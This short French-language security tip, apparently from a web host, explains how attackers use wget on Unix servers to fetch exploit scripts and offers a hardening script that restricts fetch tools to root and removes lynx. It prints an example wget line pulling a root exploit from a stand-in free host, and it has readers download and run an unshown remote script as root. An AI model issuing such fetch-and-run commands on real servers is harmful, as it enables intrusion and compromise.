Chaque serveur a des outils qui servent à aller chercher des fichiers stockés quelque part sur le web. A la base, ces outils servent aux administrateurs de serveurs pour importer des fichiers, des programmes ou des mises à jour.
Sur une installation Unix par défaut, n'importe quel utilisateur peut lancer un outil de recherche pour importer des fichiers sur le serveur. Dans la majorité des cas de piratages de serveurs de hosting, au moins une fonction de recherche a été utilisée. En effet, il est nécessaire à la personne malintentionnée de charger des scripts sur votre serveur afin de lancer leur exécution ou compilation/exécution. Quoi de mieux dans ce cas que de demander au serveur d'aller chercher lui-même les scripts malicieux.
En pratique, l'attaquant ouvre un espace chez un hébergeur gratuit et dépose dessus les outils de l'attaque. Il peut alternativement se service d'autres comptes ou serveurs pirater pour déposer ses outils. Par la suite, il ira sur votre machine et utilisera une faille sur un portail, CMS, forum, application... hébergés pour lancer une importation de ses outils. C'est une technique utilisée quotidiennement.
Une des fonctions utilisées c'est wget. Un simple:
wget
http://www.some-hebergeur-gratuit.com/scripts/r00t-exploit.cva permettre au serveur d'aller importer le script r00t-exploit.c sur votre machine.
Il faut donc restreindre l'accès à ses outils au root seulement. Par nature, Unix (qui est tellement plus sûr que Windows), permet à n'importe qui de lancer ces outils. Ils peuvent donc être lancés par des scripts PHP, CGI ou autre. Voici donc un petit script pour corriger la situation.
Ce script fait 2 choses:- Il resteint au root les outils d'importation
- Il enlève lynx si celui-ci existe. Lynx est navigateur web textuel et mis à part permettre de vous pirater, il ne sert à
rien.
Testé sur:Tous les dédié ou VPS:
- RedHat
- CentOs
- Fedora
Usage:En SSH en tant que root faites les commandes:
wget
http://www.edelweisshosting.com/secure/fetch-tools.shchmod 755 fetch-tools.sh
./fetch-tools.sh
